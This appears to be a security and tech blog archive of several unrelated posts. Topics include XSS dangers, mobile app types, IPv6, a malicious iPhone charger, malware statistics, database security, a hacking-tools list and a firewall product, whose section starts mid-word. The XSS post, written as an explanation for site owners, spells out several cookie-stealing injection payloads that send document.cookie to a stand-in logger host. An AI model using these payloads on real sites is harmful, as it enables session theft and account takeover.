THE DANGERS OF CROSS-SITE SCRIPTING (XSS)

THIS IS REALLY SERIOUS !!!

Cross-Site Scripting is the most common security vulnerability in today's websites.

Most web security professionals will write off XSS, as it does not involve remote code execution. They believe that it is not a threat, nothing could be further from the truth.

First of all: "What Is XSS?"

XSS Stands for Cross-Site Scripting.
Essentially, XSS is an exploit where client side script (usually JavaScript) is injected into a trusted page. I will get in to how this is done a little later.

Client side scripting (JavaScript) was intended to make dynamic web pages, to make web pages interactive. JavaScript is used on the vast majority of websites today for just that purpose, as well as more important features such as cookie handling, communicating with the server (AJAX and JSON), logging traffic (such as Google Analytics), and many other critical uses.

The problem arises when this highly useful and nearly universally supported language is used maliciously. Again, I will get in to what can be done a little later.

But, in summary, XSS injects a malicious piece of client side scripting (usually JavaScript, but VBscript and others are sometimes used). This code that has been injected is then used to cause some sort of vulnerability on a victim.

"How is this code injected?"

There are two essential types of XSS:
Non-Persistent
Persistent

1) Non-Persistent (Type-1):

This is when, due to improper data handling, scripting can be injected to a non permanent part of a website, for example a search feature or error page.

Scenario:

An attacker locates a way to inject script into a search feature, so that when the page states "No Posts Found For Keywords ____," an attacker can inject script where it returns the keywords.

So, via a specially crafted link, the attacker can link to the exploit. The attacker then injects a cookie stealer, and sends the link to a website administrator, who clicks the link and has her administrative cookie stolen. The attacker can now pose as the administrator and make changes to the website, and in some cases change the password so that the real administrator can not get back in.

Also, the attacker may be able to decode the cookie to get the actual plaintext password in some cases. The attacker then leverages her server side script access to get root access on the server.

2) Persistent (Type-2):

This is when, due to a poor filter, scripting can be injected in to a permanent part of a site by a user, for example a comment, a blog, or a profile.

Scenario:

An attacker, via a known injection, is able to replace his profile on MySpace with a fake login screen. The victim, not knowing that it is a fake (as it looks exactly real) logs in, and has her password and email stolen. Many people use the same user name and password for everything, so the attacker now has access to not only her MySpace account, but to her email, bank, etc. The attacker can now essentially ruin her life, from a simple injection.

"What Can Happen If I Don't Fix It?"

There are any number of terrible things that can happen if an attacker exploits an XSS vulnerability.
But, there are a few things that WILL happen:
Costs of fixing the problem WILL increase dramatically, due to the rushed nature of the work, extra damages, etc. Costs can go up many thousands of times, depending on the severity of the exploit.
Users WILL lose confidence in your website, and you WILL lose users.
There WILL be downtime.

But, as far as the specific things an attacker can do, here is a short list:
An attacker can use a cookie stealer to steal user accounts. This can even give an attacker administrative privileges on your website, even giving an attacker root privileges, then: game over. Its done. They can do literally ANYTHING to your site or the server at that point.
A fake login page can be created to trick users in to revealing private information.
Fake pages can be posted (DOM Based Attack) that could be anything from a fake blog post, to a redirect to a shock site, to a more malicious page meant to slander the website. Remember, everyone will think that the page was posted by an official at your site.
Browser exploits can be used to gain control of victims computers, install malware (viruses, spyware, etc.), or trick a user in to installing dangerous software (grayware).
A fake page can also be used to social engineer (trick) a victim in to revealing credit card, banking, SSN, or other sensitive personal information.
A clickjacking attack can be launched, to do any number of malicious things.

Remember, this is a VERY concise list, the actual list of possible attacks is endless.

"How is JavaScript used to do all of this?"

There is no one answer to this question, the number of attacks is so huge that it would be impossible to list them here. But as for some of the popular ones, here they are:

A simple search engine injection:

yoursite.com/search.pl?q=%3Cscript%3Edocument.location%3D%22http%3A//example.com/logger.php%3Fcookie%3D%22+document.cookie%3B%3C/script%3E

All of that code at the end translates to:

<script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Simply, this code redirects to a malicious site, carrying the victims cookie data in a GET variable (?cookie=). The evil site logs it, and they then have you personal information.

A few variants on that would be:

Closing <title> tag, then inject script:

</title><script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Closing text input, link title, etc, then injecting script:

"><script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>

Iframe attack:

<iframe src="javascript:parent.document.location='http://example.com/logger.php?cookie='+parent.document.cookie;"></iframe>

Link Attack (executes when the link is clicked)

<a href="javascript:document.location='http://example.com/logger.php?cookie='+document.cookie;">CLICK ME!</a>

Attribute Injection (executes when the mouse is moved anywhere on the page):

hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmousemove="document.location='http://example.com/logger.php?cookie='+document.cookie;

This results in code like:

<input type="text" value="hi" style="position:absolute;top:0px;left:0px;height:100%;width:100%;display:block;z-index:400" onmouseover="document.location='http://example.com/logger.php?cookie='+document.cookie;">

Inter-Block Injection:

hi";document.location='http://example.com/logger.php?cookie='+document.cookie;//

Resulting in JavaScript like:

var searchQuery = hi";document.location='http://example.com/logger.php?cookie='+document.cookie;//";

That is just a tiny taste of the possible injections, to a skilled attacker, those are child's play, and far more sophisticated attacks can and will be created.



"Of course, MY small site will not be affected, no hacker has any interest in MY small site!"

This is a common misconception, as attackers will often scan for common injections, and no site is spared. Even if the site is getting no more than 2 visitors a month or less, an attacker will log the vulnerability, and exploit it later, or sell it to a scammer.
In short, NO ONE is safe because of size.


"My site is so simple, there couldn't possibly be a security flaw in it."

Another common misconception, while the simpler the site, the less likley an XSS injection will be there, this does not mean your site is in any way safe.



"I used a popular paid/open source script so there can't be an XSS hole, if I paid for it, it simply can not have bad security." OR "I hired a PROFESSIONAL web developer, who is an expert in web security, if there was a problem, he would have known. This can not be a real threat if he didn't bother fixing it"

Quite possibly the most dangerous misconception of all. Web developers, weather MIT educated, or a 15 year old neighbor, often do not understand the severity of XSS, or know how to fix it. In fact, MIT educated web developers often forget to use proper filtering, they are only human. Even if they do know about the risk, they may simply forget to filter.

On the topic of paid scripts and open source scripts, they are often the most vulnerable, in fact, I located critical security flaws in multiple paid and open source shopping carts, not only XSS but other critical vulnerabilities, such as SQL injection and read exploits.




In short, no matter who made your website, or what your webmaster tells you, if there is an XSS exploit in your site, you are never safe. Period.

Native Apps VS Hybrid Apps !!!

What is a Native Application ?

Definition. Apps developed exclusively for a specific mobile platform that can leverage all device capabilities.

The inherent benefits are obvious. Native applications can leverage the full array of features and functions available through the mobile device’s core operating system. Generally, they are faster, smoother and offer a significantly more fluid user experience than either Hybrid apps or mobile Web apps.

Native Mobile Apps- Built using the native programming language for the platform like iPhone or iPad apps built using Objective-C, and Android application built with Java. Native apps are fast, provide better user experience and interface and have access to all device features for which it is built. On the down side, a native app can be used only for its specific platform thereby restricting the reach. For e.g., an android app cannot be run on an iPhone and vice versa. If you want to cover a larger audience across all platforms, you will need to have separate native apps for them.

Instagram-Example of Native Applications

Angry Birds-Example of Native Applications

What is a Hybrid Application ?

Definition. Apps that wrap a mobile web interface inside a native container

Today, technology changes so rapidly that most businesses require immense flexibility and scalability to adapt content, design and even application architecture, all on the fly. By deploying applications that rely on a robust combination of HTML5 Web technologies and native OS features, you preserve a large degree of control over the content and design of the solutions we build for mobile platforms.
We find that this process empowers our customers to perform fast, easy, on-demand updates, without losing the inherent advantages that come from hosting a solution in the iTunes Apps Store or the Android Marketplace.

While many confuse a hybrid app with a native app, but there is a fundamental distinction. A hybrid application is built using web technology, and then wrapped in a platform specific shell.  The native shell not only makes it look like native apps and makes it eligible to enter the app stores, but also, developers can build in some of the native functionalities into it, to access some of the native APIs and use device specific hardware features to some extent. A hybrid app is basically an app developed in combination with HTML 5 and native technology. For cross platform reach, developers would need to code the native part separately for each platform but they can use the same HTML5 part across all of them.

More in this video:

-And now that we know what a Hybrid & Native Application means, Here's a comparison between them:

Comparing Native to Hybrid

The following table offers a matrix comparing the benefits and various features supported by native and hybrid mobile applications.

Feature	Native	Hybrid (PhoneGap)
Access to the Contacts or Address Book	Full support	All platforms except older Blackberry OS and WebOS
Access to the Accelerometer (motion detection)	Full support	Not supported on older Blackberry OS
Camera	Full support	Not supported on older Blackberry OS
Storing data locally and offline	Full support	All platforms except older Blackberry OS and Samsung Bada
Accessing network properties and conditions	Full support	Full support
Access to the local file system for saving and retrieving files (e.g. images)	Full support	All except Symbian, older Blackberry OS, WebOS and Bada
Access to Location / GPS data	Full support	Full support
Local notifications (alerts, vibration, sound)	Full support	Full support

And here's a Video to increase your knowledge about those Apps

References and External Links:

Web Sites:

www.worklight.com

http://mobiloud.com/blog/2012/06/native-web-or-hybrid-apps/

http://www.cloudsherpas.com/services/custom-development/mobile-apps/native-hybrid-and-mobile-web-application-development/

http://www.mendix.com/blog/whats-the-big-deal-with-native-vs-web-vs-hybrid-applications/

http://sandhill.com/article/hybrid-or-native-mobile-app-development-six-key-considerations/

http://www.quora.com/Mobile-Applications/What-is-the-difference-between-HTML5-Native-and-a-Hybrid-app-Which-is-better

http://www.xcubelabs.com/blog/native-web-and-hybrid-apps-understanding-the-difference/

http://www.icenium.com/resources/forums/icenium-general-discussion/native-vs-hybrid-app

http://scn.sap.3com/thread/3365532

Video Links:

 

https://www.youtube.com/watch?v=Ns-JS4amlTc

https://www.youtube.com/watch?v=HDnNEKtBkBE

One Year After World IPv6 Launch, Number Of IPv6-Connected Internet Users Doubles

WASHINGTON, D.C., USA and GENEVA, SWITZERLAND – 3 June 2013 – The number of IPv6-connected users has doubled since World IPv6 Launch began on June 6, 2012, when thousands of Internet service providers (ISPs), home networking equipment manufacturers, and Web companies around the world came together to permanently enable the next generation of Internet Protocol (IPv6) for their products and services. This marks the third straight year IPv6 use on the global Internet has doubled. If current trends continue, more than half of Internet users around the world will be IPv6-connected in less than 6 years.

“The year since World IPv6 Launch began has cemented what we know will be an increasing reality on the Internet: IPv6 is ready for business,” said Leslie Daigle, the Internet Society’s Chief Internet Technology Officer. “Forward-looking network operators are successfully using IPv6 to reduce their dependency on expensive, complex network address translation systems (CGNs) to deal with a shortage of IPv4 addresses. Leaders of organizations that aspire to reach all Internet users must accelerate their IPv6 deployment plans now, or lose an important competitive edge.”

As IPv6 adoption continues to grow, members of the worldwide Internet community are contributing to its deployment. Statistics reported by World IPv6 Launch participants underscore the increasing deployment of IPv6 worldwide:

• Google reports the number of visitors to its sites using IPv6 has more than doubled in the past year. • The number of networks that have deployed IPv6 continues to grow, with more than 100 worldwide reporting significant IPv6 traffic. • Australian ISP Internode reports that 10 percent of its customers now use IPv6 to access the Internet. • Akamai reports that it is currently delivering approximately 10 billion requests per day over IPv6, which represents a 250 percent growth rate since June of last year. • KDDI measurement shows that the number of IPv6 users of KDDI has doubled and that IPv6 traffic has increased approximately three times from last year.

World IPv6 Launch participants have worked together to help drive adoption, leading to the creation of World IPv6 Day in 2011, in which hundreds of websites joined together for a successful global 24-hour test flight of IPv6. This was followed by World IPv6 Launch in 2012, in which more than a thousand participants permanently enabled IPv6 for their products and services, including four of the most visited websites: Google, Facebook, YouTube, and Yahoo!.

As a platform for innovation and economic development, the Internet plays a critical role in the daily lives of billions. This momentum has not slowed — IPv6 adoption continues to skyrocket, fast establishing itself as the “new normal” and a must-have for any business with an eye towards the future.

For more information about companies that have deployed IPv6, as well as links to useful information for users and how other companies can participate in the continued deployment of IPv6, please visit: http://www.worldipv6launch.org

About the need for IPv6 IPv4 has approximately four billion IP addresses (the sequence of numbers assigned to each Internet-connected device). The explosion in the number of people, devices, and web services on the Internet means that IPv4 is running out of space. IPv6, the next-generation Internet protocol which provides more than 340 trillion, trillion, trillion addresses, will connect the billions of people not connected today and will help ensure the Internet can continue its current growth rate indefinitely.

Hacking Your IPhone From Your Charger !!!

Researchers Say They Can Hack Your iPhone With A Malicious Charger

Careful what you put between your iPhone and a power outlet: That helpful stranger’s charger may be injecting your device with more than mere electrons.

At the upcoming Black Hat security conference in late July, three researchers at the Georgia Institute of Technology plan to show off a proof-of-concept charger that they say can be used to invisibly install malware on a device running the latest version of Apple’s iOS.

Though the researchers aren’t yet sharing the details of their work, a description of their talk posted to the conference website describes the results of the experiment as “alarming. Despite the plethora of defense mechanisms in iOS, we successfully injected arbitrary software into current-generation Apple devices running the latest operating system (OS) software,” their talk summary reads. “All users are affected, as our approach requires neither a jailbroken device nor user interaction.”

The researchers’ malicious charger, which they’re calling “Mactans” in what seems to be a reference to the scientific name of the Black Widow spider, is built around an open-source single-board computer known as a BeagleBoard, sold by Texas Instruments for a retail price of around $45. “This hardware was selected to demonstrate the ease with which innocent-looking, malicious USB chargers can be constructed,” the researchers write.

It’s not clear just how convincing that charger will be, of course, given that a three-inch square BeagleBoard can’t fit into the smaller power adaptors Apple sells for charging its gadgets, like the one shown above. But a BeagleBoard could be hidden in a docking station or external battery, and the team hints that others with more resources may be able to advance their work: “While Mactans was built with [a] limited amount of time and a small budget, we also briefly consider what more motivated, well-funded adversaries could accomplish.”

When I spoke by phone Friday with Yeongjin Jang, one of the Georgia Tech researchers, he told me that the team had contacted Apple about their exploit, but hadn’t yet heard back from the company, and declined to comment further. I reached out to Apple, too, and will update this post if the company responds.

The researchers write that their attack can compromise an iOS device running the most recent version of Apple’s mobile operating system in less than a minute. They add that they can also demonstrate that the malware infection resulting from their malicious charger is persistent and tough to spot. “We show how an attacker can hide their software in the same way Apple hides its own built-in applications,” reads their description.

The Georgia Tech researchers would be far from the first to hack iOS devices via their USB connections. The devices’ combined data and power port has been the most common point of entry for hackers seeking to jailbreak their devices to remove Apple’s default restrictions on their devices. The “evasi0n” jailbreak released by a group of iOS hackers in February, for instance, took advantage of a flaw in iOS’s mobile backup system as well as four other bugs to dismantle the devices’ security measures.

That jailbreak was used more than 18 million times by iOS users eager to hack their iPhone, iPads and iPod touches before Apple updated their software to block the exploit in March. Given that Georgia Tech is demonstrating a far less friendly technique, expect Apple to move fast to patch the bugs they’re exposing.

Trojan Causes 80 percent of computers infected worldwide

Trojan Causes 80 percent of computers infected worldwide !!!

Panda security recently announced the release of its quarterly report for Q1 2013, which states that more than six million new malware, has been launched between January and March of this year, and Trojan represents three out of the four new released malware samples in circulation during the same period.
The report also said that Trojan has contributed about 79.99 percent infections of all computers worldwide. Trojans are cyber crooks weapon of choice, which explains why they account for most new specimens in circulation and infections triggered in the first quarter of the year,” Panda Labs technical director Luis Corrons said in a statement.

According to the report the total computer infected worldwide is more than 30.31 percent, it been noted that china has the largest number of computer infected having 50 percent of computers infected, followed by Ecuador at 41.01 percent, Turkey at 40.38 percent, Argentina at 37.77 percent, Peru at 37.43 percent, and Taiwan at 36.48 percent.Conversely, Finland has the fewest infections, at 17 percent, followed by Sweden at 20 percent, Switzerland at 20.99 percent, the United Kingdom at 21.89 percent, Norway at 22.57 percent, and Japan at 22.82 percent.
Warning: Use a standard anti-virus software to shield your computer.

Why we need IPv6 now and what it means for network security

Thomas Edison, in 1882, opened a power station on Pearl Street in New York city to supply the densely populated Manhattan island with DC power [1]. DC was the logical power distribution standard at the time. Easily generated and safely distributed across the limited geographic area it was intended to supply. Soon followed a fierce debate about power standards. From it emerged what we now know as the electricity grid. AC, alternating current, won out for a pretty simple reason: It scaled. It could be expanded into a large interconnected network. Omnipresent reliable electric power continued to drive our economy and innovation.

Todays’ Internet is undergoing a similar debate. Originally, the Internet standard communications protocol (“IPv4″, or “Internet Protocol Version 4″) was conceived in the 70s and 80s. It’s intent was to interconnect research universities and government facilities. It was never intended to be today’s global business network. Memory of computers connected to the early Internet was measured in kilo bytes [2]. Connectivity between facilities was frequently provided by dialup modems. We have outgrown every single one of these specifications by orders of magnitude. The most apparent limitation of IPv4 is its lack of address space. Designed for a limited number of research campuses, IPv4 provides up to 4 billion addresses. IPv4 was never designed to have all 4 Billion addresses used. Certainly not to supply the current world population of 7 Billion [3]. Today, the number of devices connected to the Internet exceeds the number of people alive [4]. The current use (and over use) of addresses causes delays and difficulties in routing Internet traffic and limits the growth of the Internet in particular in emerging markets. Mobile technologies are held back because network providers can not assign routable addresses to every mobile device.

Time to rethink. IPv6 (Internet Protocol Version 6) is about to ring in a new age for the Internet. It not only substantially increases the amount of addresses, but also enables more efficient routing, the efficient use of modern hardware and the ability to support modern networking concepts like mobility. If it is so great, why is everybody so slow in adopting it? If it is not broken, don’t fix it! The current IPv4 Internet is working just well enough. Network operators around the globe don’t see the need to upgrade equipment, and learn about new technology, unless customers demand it.

Just like when Tesla advocated AC power back around the turn of the century, and Edison stole cats and dogs across Manhattan to electrocute them in a public demonstration of the danger of AC power, much of today’s fear of IPv6 is based on the assumption that IPv6 is insecure[5]. We barely learned how to somewhat secure our IPv4 network. Understandably network administrators are hesitant to throw out the operational experience gained in running IPv4 networks. But in addition to new complexities and changes offered by IPv6, there are a number of important security improvements. IPv4 was not designed to be secure. The standard defining IPv4 originally, known as “RFC 791″, specifically states that there is “no mechanisms to augment end-to-end data reliability,…” [6]. Features like virtual private networks with encryption, reliable routing and authentication where bolted on later and never properly integrated. IPv6 does however integrate these later additions properly, and even provides for future expansion in an organized way.

There are a number of important security features that are either already implemented in IPv6, or that are on the drawing board for the near future:
IPSec (encrypted VPNs) are now a mandatory component. IPSec still needs to be configured properly, but at least it is now universally available.
A plethora of addresses will allow for logic and functional address assignment. We no longer need to design subnet sizes around “what’s available” but we can now design networks that make sense.
Addresses with different scopes allow for the proper isolation of hosts.
Simplified rules for fragmentation make it easier to defend diverse networks with different network technologies.
If desired, end to end connectivity with reliance on “NAT” (Network Address Translation) will allow for a simpler configuration of end-to-end encrypted networks
Address will no longer be shared among different devices, allowing for an easier attribution of network traffic and simpler asset control.
Using a so far not widely implemented extension, it will be possible to create addresses cryptographically and validate them on the local network.[7]

These are just some of the more prominent security features built into IPv6. Needless to say, network administrators need to gain experience with these features and lear to use them. Luckily, IPv4 and IPv6 can operate next to each other, and we don’t need to switch over in one day. June 6th has been designated “IPv6 day” by the Internet Society [8]. Many large web sites will be reachable via IPv6 starting June 6th. How long will it take to “cut over” and when will we be able to “turn off” IPv4? Con Edison, the New York power company that emerged out of Edison’s first attempts in Manhattan, disconnected it’s last DC cutovers in 2007, 125 years after the network was originally implemented. Thats’ about 12 years in “Internet Time”.

[1] http://cityroom.blogs.nytimes.com/2007/11/14/off-goes-the-power-current-started-by-thomas-edison/
[2] http://www-03.ibm.com/ibm/history/exhibits/mainframe/mainframe_intro2.html
[3] http://www.census.gov/main/www/popclock.html
[4] http://blogs.cisco.com/news/the-internet-of-things-infographic/
[5] http://theoatmeal.com/comics/tesla
[6] http://www.ietf.org/rfc/rfc791.txt
[7] http://ipv6.com/articles/research/Secure-Neighbor-Discovery.htm
[8] http://www.worldipv6day.org/



To learn more about IPv6, also see https://isc.sans.edu/ipv6videos

What Every Database Administrator Should Know About Security

To say that there is friction between security professionals and database administrators (DBAs) is putting it mildly.

Database administrators are both the caretakers of database platforms and the managers of data. Very seldom are they also security experts. In many enterprises, the DBA and the security team find themselves at odds because the DBA is judged on availability and ease of use, not security. Yet the security team advocates controls that restrict access, add complexity and slow database performance. That's not a recipe for keeping end users happy, and DBAs tend to bear the brunt of criticism.

Databases hold a majority of the sensitive data within most enterprises, and have been a prime target for attackers for more than a decade. The considerable skills database administrators bring to the table are often marginalized, with security teams failing to leverage these valuable skills because they feel DBAs lack the "security mindset" needed to comprehend wickedly resourceful attackers who target enterprise data. Security does not trust DBAs becausethey feel they lack an understanding of the problems at hand.

Bridging the gap between DBAs and security professionals--bringing their respective strengths into play--can only make a company more resilient. The goal is to educate DBAs on the problems security teams are trying to address, and to arm them with enough information so that they can both appreciate the motivation of security requirements and help propose implementations that secure data while not smashing performance and productivity. In this way, DBAs and security pros can work together to create database environments that are not only functional, but highly secure.

The first step in this process is to talk about what most DBAs don't know. To better close the gap between security and database management, let's address the issues of why security is important and some of the key reasons security teams don't work closely with DBAs.

DBAs are not vulnerability researchers.

As a database administrator, it's likely you don't understand half of the vulnerabilities databases are vulnerable to. That's not meant as an insult--even within the security community, vulnerability research is a specialized sub-discipline practiced by only a handful of people. With that said, it's important that youfollow these issues if you want to understand why security teams ask you implement specific security controls. Much in the same way you need to understand how bugs affect the database, or how some settings affect stability and performance, you need to have a basic understanding of vulnerabilities.

Essentially, there are three critical things you need to know about any vulnerability: which feature is/was at risk; the basic methods attackers use to exploit the vulnerability; and whether the vulnerability requires credentials to exploit. You can learn more from CERT/Mitre announcements, vendor security announcements and vendor best practices, as well as from following security and/or database blogs.

Hackers know databases as well as you do.

Hackers spend hundreds of hours examining specific features. They work tirelessly to understand how these features work and, more importantly, how a feature can be made to misbehave. They understand the internal workings of the database, and usually how a feature's documented specification differs from the implementation.

There's no such thing as a "minor database vulnerability no one else knows about." Attackers are aware of potential flaws, and they will know how to probe your database to see if it's vulnerable to those flaws.

To read more key points that database administrators should know about security -- and how security people can communicate them -- download the free report.

Top 15 Security/Hacking Tools & Utilities

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here



3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

– machines that connect to your box (SYN mode),
– machines you connect to (SYN+ACK mode),
– machine you cannot connect to (RST+ mode),
– machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwordsusing Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

How Computer Viruses Works ?

This is a simple video about how Computer Viruses Works

And this is simply how Antiviruses Works in a funny way

Latest Technology in Firewalls

First of all , we need to know what a Firewall is ?

A firewall is software or hardware-based network security system that controls the incoming and outgoing network traffic by analyzing the data packets and determining whether they should be allowed through or not, based on a rule set. A network's firewall builds a bridge between the internal network or computer it protects, upon securing that the other network is secure and trusted, usually an external (inter)network, such as the Internet, that is not assumed to be secure and trusted.

Many personal computer operating systems include software-based firewalls to protect against threats from the public Internet. Many routers that pass data between networks contain firewall components and, conversely, many firewalls can perform basic routing functions.

------------------------------------------------------------------------

And here is the latest hardware firewall technology 

ve been the number one target of hackers. Companies, organizations, and governments that utilize the internet for commerce and communication are at risk of having vital private, proprietary, secret, and/or confidential information leaked via their web applications. Web attacks grow more sophisticated every day. As such, it can be difficult to find a security product that can accurately detect and block both known and unknown attacks – including the top ten critical threats against web applications outlined by OWASP – while minimizing the administrative burden without hampering system performance. However, WAPPLES – the web application firewall from Penta Security – can accomplish those things.

Detects and blocks website attacks

 Prevents website defacement and counterfeit websites
 Prevents web attacks designed to steal information
Provides real-time monitoring and security alerts
Enables High Availability (HA) to prevent any service disruptions
Offers easy and convenient installation and management
Reduces web application security management costs
Optimizes speed of service by blocking unnecessary traffic

Operates on a logic analysis based engine

Capable of detecting both known and previously unknown attacks
Extremely low rate of false positives compared to other products

Does not strain the pre-existing system

Can be installed using a variety of methods that do not place an extra load on the system.
In case there is a hardware problem, the BYPASS feature provides continued service without any disruptions.
WAPPLES can be installed in various network configurations, including in-line, reverse proxy, transparent proxy, and High Availability (HA).

Convenient

Highly skilled administrative staff are not required to operate WAPPLES, due to the combination of its easy-to-use GUI and the intelligent logic analysis based engine.
As WAPPLES itself, not an administrator, is responsible for both detecting attacks and determining and launching appropriate countermeasures, the burden on administrative staff is minimal.

Offers flexible, real-time management

WAPPLES allows administrators to monitor equipment operation status as well as security threats in real-time.
WAPPLES offers customizable reporting, which can provide a variety of statistical data.

Transparent Proxy Method

The web server and firewall are installed and managed using an In-Line method
Ability to install without changing the network setup
Change in web server IP and DNS are not needed
Web client IP is preserved and conveyed to the web server
Supports the Bypass feature

Reverse Proxy Method

DNS sets up and operates the WAPPLES IP address as the web server’s IP address
Prevents exposure of internal web server and web application server configuration
Cloaking effect
Web client’s IP address is converted to the WAPPLES IP address and then conveyed to the web server
X-Forwarded-For, ability to use the header configuration to preserve and convey client IP
Only the HTTP traffic is allowed to pass through providing stronger website security

Reverse Proxy Method (CSLB)

Utilizes the L4 switch Cache Server Load Balancing (CSLB) feature
Uses the CSLB configuration to differentiate web traffic
Ability to utilize L4 switch’s Health Check feature
Suitable for dual networks and complex environments

Product Features

WAPPLES runs on an intelligent logic analysis engine called Contents Classification and Evaluation Processing, or COCEP. This logic analysis engine utilizes a system of 26 ‘rules’ (see below for detailed explanations of each rule) to execute a logical analysis of all types of traffic. This analysis enables WAPPLES to determine whether or not the traffic constitutes a threat to the web application, and to take appropriate countermeasures when threats are detected. If traffic can successfully pass through all 26 rules, WAPPLES determines that the traffic is not an attack, and transports the data to the web application. The split-second performance of the COCEP enables WAPPLES to determine if traffic is safe in just 1/1000 of a second, leaving system performance unaffected

.

Buffer Overflow	Blocks invalid requests causing buffer overflow attacks
Cookie Poisoning	Blocks the falsification of cookies containing authentication information
Cross Site Scripting	Blocks malicious script code having the possibility to be executed by the client
Directory Listing	Blocks the leakage of web sites’ directory and files
Error Handling	Controls error messages so as to avoid exposure of information about web server, WAS, DBMS server, etc.
Extension Filtering	Blocks access of files which do not have permitted file extensions
File Upload	Blocks the upload of files which can be executed on the web server
Include Injection	Blocks the injection of untrustworthy files and external URIs
Input Content Filtering	Blocks or substitute words that are not permitted on a web site
Invalid HTTP	Blocks access not in compliance with HTTP standards
Invalid URI	Blocks access not in compliance with standard URI syntax
IP Black List	Blocks when more than the set value of access attempts from the same source IP are detected during a specific time (value set by user)
IP Filtering	Blocks access to a specific IP range or countries (set by user)
Parameter Tampering	Blocks attacks which send maliciously manipulated parameters to websites
Privacy File Filtering	Blocks leakage of private information from files transmitted from the web server
Privacy Input Filtering	Blocks leakage of private information via HTTP request
